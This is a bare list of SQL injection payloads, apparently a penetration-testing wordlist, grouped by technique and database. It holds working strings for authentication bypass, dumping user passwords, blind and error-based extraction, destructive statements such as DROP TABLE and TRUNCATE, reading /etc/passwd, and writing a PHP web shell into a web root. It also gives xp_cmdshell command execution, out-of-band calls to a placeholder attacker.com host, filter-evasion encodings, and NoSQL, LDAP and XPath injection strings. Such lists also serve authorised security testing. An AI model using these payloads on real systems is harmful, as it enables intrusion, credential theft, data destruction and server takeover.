# SQL Injection Payloads

# Basic SQL Injection
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
' OR 1=1 --
' OR 1=1 /*
" OR "1"="1
" OR "1"="1" --
" OR "1"="1" /*

# Union-Based SQL Injection
' UNION SELECT NULL, NULL --
' UNION SELECT username, password FROM users --
' UNION SELECT NULL, NULL, NULL --
' UNION SELECT 1,2,3,4,5 --
' UNION SELECT database(), user(), version() --
' UNION ALL SELECT NULL, NULL --
' UNION ALL SELECT 1,2,3 --

# Error-Based SQL Injection
' AND 1=CONVERT(int, (SELECT @@version)) --
' AND 1=CAST((SELECT @@version) AS int) --
' AND 1=1/0 --
' AND 1=GTID_SUBSET(@@version,0) --

# Blind SQL Injection
' AND SLEEP(5) --
' AND IF(1=1,SLEEP(5),0) --
' AND (SELECT * FROM (SELECT(SLEEP(5)))a) --
' AND BENCHMARK(10000000,MD5(1)) --
' AND 1=1 AND SLEEP(5) --
' AND 1=2 AND SLEEP(5) --

# Time-Based SQL Injection
' AND IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0) --
' AND IF(ASCII(SUBSTRING((SELECT database()),1,1))>100,SLEEP(5),0) --
' AND IF(ASCII(SUBSTRING((SELECT user()),1,1))>100,SLEEP(5),0) --

# Out-of-Band SQL Injection
'; EXEC xp_cmdshell('ping attacker.com') --
'; EXEC master..xp_dirtree '\\attacker.com\share' --
' UNION SELECT LOAD_FILE('\\\\attacker.com\\share') --

# MySQL Specific
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(@@version,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT user()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --

# PostgreSQL Specific
' AND (SELECT CAST(@@version AS INTEGER)) --
' AND (SELECT 1/COUNT(*) FROM pg_class WHERE relname=(SELECT CURRENT_DATABASE())) --
' AND (SELECT 1 FROM (SELECT PG_SLEEP(5))a) --

# Microsoft SQL Server Specific
' AND (SELECT @@version) --
' AND (SELECT DB_NAME()) --
' AND (SELECT SYSTEM_USER) --
' AND (SELECT @@SERVERNAME) --
' AND 1=CONVERT(int,@@version) --

# Oracle Specific
' AND (SELECT 1 FROM dual) --
' AND (SELECT banner FROM v$version WHERE rownum=1) --
' AND (SELECT 1 FROM dual WHERE DBMS_PIPE.RECEIVE_MESSAGE(('a'),5)=1) --

# Advanced SQL Injection
'; DROP TABLE users; --
'; UPDATE users SET password='hacked' WHERE username='admin'; --
'; INSERT INTO users (username, password) VALUES ('hacker', 'hacked'); --
'; ALTER TABLE users ADD COLUMN hacked VARCHAR(255); --
'; CREATE TABLE hacked (data TEXT); --
'; TRUNCATE TABLE users; --

# Bypass Techniques
'/**/OR/**/'1'='1
'/*!50000OR*/'1'='1
'/*!50000UNION*//*!50000SELECT*/1,2,3
'%0AOR%0A'1'='1
'%0DOR%0D'1'='1

# Hexadecimal Encoding
0x27204f52202731273d2731
0x27204f52202731273d273127202d2d

# Unicode Encoding
%u0027%u0020%u004f%u0052%u0020%u0027%u0031%u0027%u003d%u0027%u0031
%u0027%u0020%u004f%u0052%u0020%u0027%u0031%u0027%u003d%u0027%u0031%u0027%u0020%u002d%u002d

# Double Encoding
%2527%2520%254f%2552%2520%2527%2531%2527%253d%2527%2531
%2527%2520%254f%2552%2520%2527%2531%2527%253d%2527%2531%2527%2520%252d%252d

# Case Variation
SeLeCt 1,2,3
UnIoN SeLeCt 1,2,3
UnIoN AlL SeLeCt 1,2,3

# Comment Variations
' OR '1'='1' --
' OR '1'='1' /*
' OR '1'='1' #
' OR '1'='1' -- -
' OR '1'='1' /*! */

# Boolean-Based Blind
' AND ASCII(SUBSTRING((SELECT database()),1,1))>100 --
' AND ASCII(SUBSTRING((SELECT user()),1,1))>100 --
' AND ASCII(SUBSTRING((SELECT @@version),1,1))>100 --

# Information Schema Queries
' UNION SELECT table_name, column_name FROM information_schema.columns --
' UNION SELECT table_schema, table_name FROM information_schema.tables --
' UNION SELECT column_name, data_type FROM information_schema.columns WHERE table_name='users' --

# User Enumeration
' UNION SELECT user, password FROM mysql.user --
' UNION SELECT name, password_hash FROM sys.sql_logins --
' UNION SELECT username, password FROM dba_users --

# Database Enumeration
' UNION SELECT schema_name, NULL FROM information_schema.schemata --
' UNION SELECT table_name, table_schema FROM information_schema.tables --
' UNION SELECT column_name, table_name FROM information_schema.columns --

# File System Access
' UNION SELECT LOAD_FILE('/etc/passwd'), NULL --
' UNION SELECT LOAD_FILE('C:\\Windows\\win.ini'), NULL --
' INTO OUTFILE '/tmp/backdoor.php' --
' INTO DUMPFILE '/tmp/backdoor.php' --

# Command Execution
' UNION SELECT '<?php system($_GET["cmd"]); ?>', NULL INTO OUTFILE '/var/www/html/shell.php' --
'; EXEC xp_cmdshell('dir C:\\') --
'; EXEC master..xp_cmdshell('ping 127.0.0.1') --

# Authentication Bypass
admin' --
admin' OR '1'='1
admin' OR '1'='1' --
admin' OR '1'='1' /*
admin' OR 1=1 --
admin' OR 1=1 /*
admin' OR 'a'='a
admin' OR 'a'='a' --

# Password Bypass
' OR '1'='1' LIMIT 1 --
' OR '1'='1' LIMIT 1,1 --
' OR '1'='1' ORDER BY 1 --
' OR '1'='1' GROUP BY 1 --

# Stacked Queries
'; SELECT 'hacked' --
'; SELECT * FROM users --
'; SELECT @@version; --

# Second Order SQL Injection
' UNION SELECT (SELECT password FROM users WHERE username='admin'), NULL --
' UNION SELECT (SELECT @@version), NULL --

# NoSQL Injection
{"$ne": null}
{"$gt": ""}
{"$regex": ".*"}
{"$where": "1==1"}

# JSON Injection
' OR JSON_EXTRACT('{"a":1}', '$.a')=1 --
' OR JSON_CONTAINS('{"a":1}', '1', '$.a') --

# XML Injection
' AND EXTRACTVALUE(1, CONCAT(0x3a, (SELECT @@version))) --
' AND UPDATEXML(1, CONCAT(0x3a, (SELECT @@version)), 1) --

# LDAP Injection
*)(uid=*))(|(uid=*
*))(|(uid=*
admin)(&)
admin*)(&)

# XPATH Injection
' or '1'='1
' or 1=1
' or position()=1

# End of File